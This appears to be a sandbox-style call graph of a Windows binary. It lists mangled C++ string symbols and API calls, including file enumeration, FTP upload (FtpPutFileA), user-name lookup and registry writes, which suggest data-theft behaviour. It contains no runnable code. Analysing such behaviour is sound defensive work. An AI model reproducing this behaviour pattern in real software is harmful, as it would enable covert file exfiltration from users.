??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1418->1420 1453 672b07 1418->1453 1502 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1419->1502 1423 674bfc 7 API calls 1420->1423 1421->1409 1421->1412 1426 673557 1423->1426 1424 672c93 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1430 672cc1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1424->1430 1424->1453 1425 672b2f 6 API calls 1427 672bd4 6 API calls 1425->1427 1428 672ba1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1425->1428 1426->1315 1505 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1427->1505 1428->1427 1428->1428 1503 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1429->1503 1434 672d53 8 API calls 1430->1434 1435 672d1e 1430->1435 1433 67336d 1433->1420 1437 673375 memset 1433->1437 1439 672e01 fgetc 1434->1439 1438 672d20 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1435->1438 1436 672c40 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1506 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1436->1506 1441 673396 1437->1441 1442 6733be ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1437->1442 1438->1434 1438->1438 1443 672e18 fputc 1439->1443 1439->1453 1445 6733a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1441->1445 1510 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1442->1510 1443->1453 1444 672c59 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpPutFileA 1450 67333d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1444->1450 1445->1442 1445->1445 1447 672e3c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1507 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1447->1507 1449 672faf fclose fclose 1449->1453 1454 672fd3 6 API calls 1449->1454 1450->1453 1451 6733da RegOpenKeyExA RegSetValueExA RegCloseKey 1451->1420 1455 673432 8 API calls 1451->1455 1452 672e55 6 API calls 1456 672ef4 8 API calls 1452->1456 1457 672ec1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1452->1457 1453->1424 1453->1425 1453->1433 1453->1439 1453->1447 1453->1449 1453->1450 1458 673083 7 API calls 1454->1458 1459 673050 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1454->1459 1455->1420 1456->1453 1457->1456 1457->1457 1508 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1458->1508 1459->1458 1459->1459 1461 673121 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1462 6731a6 9 API calls 1461->1462 1463 673173 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1461->1463 1464 673283 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1462->1464 1465 673249 1462->1465 1463->1462 1463->1463 1509 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1464->1509 1467 673250 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1465->1467 1467->1464 1467->1467 1468 6732b7 7 API calls 1468->1453 1468->1454 1470 673993 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD GetUserNameA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1469->1470 1471 673800 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD GetUserNameA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1469->1471 1473 6712b0 3 API calls 1470->1473 1472 6712b0 3 API calls 1471->1472 1474 673867 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1472->1474 1475 6739f8 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI CreateDirectoryA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1473->1475 1476 6712b0 3 API calls 1474->1476 1477 6712b0 3 API calls 1475->1477 1478 6738b2 12 API calls 1476->1478 1479 673a2d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1477->1479 1480 673b4f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1478->1480 1481 6712b0 3 API calls 1479->1481 1483 671480 85 API calls 1480->1483 1482 673a78 12 API calls 1481->1482 1482->1480 1484 673b65 1483->1484 1485 674bfc 7 API calls 1484->1485 1486 673b86 1485->1486 1486->1311 1487->1356 1488->1361 1489->1364 1490->1394 1492 671c42 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1491->1492 1493 671b11 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1491->1493 1494 674bfc 7 API calls 1492->1494 1495 671b71 fgetc 1493->1495 1496 671ca2 9 API calls 1494->1496 1497 671b83 fputc 1495->1497 1498 671b8d 8 API calls 1495->1498 1496->1399 1497->1495 1499 671c1e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1498->1499 1500 671c0b ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI DeleteFileA 1498->1500 1499->1492 1500->1499 1501->1405 1502->1409 1503->1409 1504->1418 1505->1436 1506->1444 1507->1452 1508->1461 1509->1468 1510->1451 1876 6725b9 1877 6725c0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1876->1877 1877->1877 1878 6725f3 6 API calls 1877->1878 1879 672683 1878->1879 1880 672a3f FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1878->1880 1882 672a20 FindNextFileA 1879->1882 1883 67269e 7 API calls 1879->1883 1886 67288e FindNextFileA 1879->1886 1889 67275d 10 API calls 1879->1889 1891 672a09 FindNextFileA 1879->1891 1899 6728da 10 API calls 1879->1899 1881 671260 4 API calls 1880->1881 1884 672a9e ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1881->1884 1882->1879 1885 672a3b 1882->1885 1883->1879 1883->1886 1941 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1884->1941 1885->1880 1886->1879 1886->1882 1888 672adc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA 1890 6734e0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1888->1890 1903 672b07 1888->1903 1939 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1889->1939 1893 674bfc 7 API calls 1890->1893 1891->1879 1891->1882 1896 673557 1893->1896 1894 672c93 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1900 672cc1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1894->1900 1894->1903 1895 672b2f 6 API calls 1897 672bd4 6 API calls 1895->1897 1898 672ba1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1895->1898 1942 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1897->1942 1898->1897 1898->1898 1940 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1899->1940 1905 672d53 8 API calls 1900->1905 1906 672d1e 1900->1906 1903->1894 1903->1895 1904 67336d 1903->1904 1910 672e01 fgetc 1903->1910 1918 672e3c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1903->1918 1920 672faf fclose fclose 1903->1920 1921 67333d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1903->1921 1904->1890 1908 673375 memset 1904->1908 1905->1910 1909 672d20 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1906->1909 1907 672c40 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1943 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1907->1943 1912 673396 1908->1912 1913 6733be ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1908->1913 1909->1905 1909->1909 1910->1903 1914 672e18 fputc 1910->1914 1916 6733a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1912->1916 1947 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1913->1947 1914->1903 1915 672c59 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpPutFileA 1915->1921 1916->1913 1916->1916 1944 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1918->1944 1920->1903 1924 672fd3 6 API calls 1920->1924 1921->1903 1922 6733da RegOpenKeyExA RegSetValueExA RegCloseKey 1922->1890 1925 673432 8 API calls 1922->1925 1923 672e55 6 API calls 1926 672ef4 8 API calls 1923->1926 1927 672ec1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1923->1927 1928 673083 7 API calls 1924->1928 1929 673050 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1924->1929 1925->1890 1926->1903 1927->1926 1927->1927 1945 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1928->1945 1929->1928 1929->1929 1931 673121 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1932 6731a6 9 API calls 1931->1932 1933 673173 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1931->1933 1934 673283 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1932->1934 1935 673249 1932->1935 1933->1932 1933->1933 1946 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1934->1946 1937 673250 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1935->1937 1937->1934 1937->1937 1938 6732b7 7 API calls 1938->1903 1938->1924 1939->1879 1940->1879 1941->1888 1942->1907 1943->1915 1944->1923 1945->1931 1946->1938 1947->1922 1950 672687 1951 672690 1950->1951 1952 672a20 FindNextFileA 1951->1952 1953 67269e 7 API calls 1951->1953 1955 67288e FindNextFileA 1951->1955 1958 67275d 10 API calls 1951->1958 1959 672a09 FindNextFileA 1951->1959 1963 6728da 10 API calls 1951->1963 1952->1951 1954 672a3b FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1952->1954 1953->1951 1953->1955 1957 671260 4 API calls 1954->1957 1955->1951 1955->1952 1960 672a9e ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1957->1960 2011 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1958->2011 1959->1951 1959->1952 2013 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1960->2013 2012 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1963->2012 1964 672adc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpCreateDirectoryA 1966 6734e0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1964->1966 1995 672b07 1964->1995 1967 674bfc 7 API calls 1966->1967 1970 673557 1967->1970 1968 672c93 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1973 672cc1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1968->1973 1968->1995 1969 672b2f 6 API calls 1971 672bd4 6 API calls 1969->1971 1972 672ba1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1969->1972 2014 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1971->2014 1972->1971 1972->1972 1976 672d53 8 API calls 1973->1976 1977 672d1e 1973->1977 1975 67336d 1975->1966 1979 673375 memset 1975->1979 1981 672e01 fgetc 1976->1981 1980 672d20 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1977->1980 1978 672c40 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 2015 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1978->2015 1983 673396 1979->1983 1984 6733be ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1979->1984 1980->1976 1980->1980 1985 672e18 fputc 1981->1985 1981->1995 1987 6733a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1983->1987 2019 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1984->2019 1985->1995 1986 672c59 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI FtpPutFileA 1992 67333d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1986->1992 1987->1984 1987->1987 1989 672e3c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 2016 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1989->2016 1991 672faf fclose fclose 1991->1995 1996 672fd3 6 API calls 1991->1996 1992->1995 1993 6733da RegOpenKeyExA RegSetValueExA RegCloseKey 1993->1966 1997 673432 8 API calls 1993->1997 1994 672e55 6 API calls 1998 672ef4 8 API calls 1994->1998 1999 672ec1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1994->1999 1995->1968 1995->1969 1995->1975 1995->1981 1995->1989 1995->1991 1995->1992 2000 673083 7 API calls 1996->2000 2001 673050 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1996->2001 1997->1966 1998->1995 1999->1998 1999->1999 2017 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 2000->2017 2001->2000 2001->2001 2003 673121 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 2004 6731a6 9 API calls 2003->2004 2005 673173 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 2003->2005 2006 673283 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II 